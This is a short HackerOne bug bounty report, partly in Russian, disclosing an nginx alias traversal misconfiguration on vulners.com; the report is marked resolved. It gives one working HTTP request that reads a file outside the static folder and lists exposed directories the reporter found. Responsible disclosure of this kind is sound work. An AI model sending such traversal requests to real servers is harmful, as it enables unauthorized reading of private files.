[vulners.com] nginx alias_traversal
Medium
Vulnerability Details
Incorrect configuration of alias could allow an attacker to read file stored outside the target folder.
https://github.com/yandex/gixy/blob/master/docs/en/plugins/aliastraversal.md
Уязвимость только в конфигурации http, на https такого нет.
Пример:
```http
GET /static../monit/COPYING HTTP/1.1
Host: vulners.com
```
{F264475}
Примеры директорий, которые я обнаружил
```
rh/
nginx/cache/
monit/bin/monit
monit/conf/
monit/man/
monit/COPYING
monit/CHANGES
```
## Impact
Incorrect configuration of alias could allow an attacker to read file stored outside the target folder.
Actions
View on HackerOneReport Stats
- Report ID: 317201
- State: Closed
- Substate: resolved
- Upvotes: 14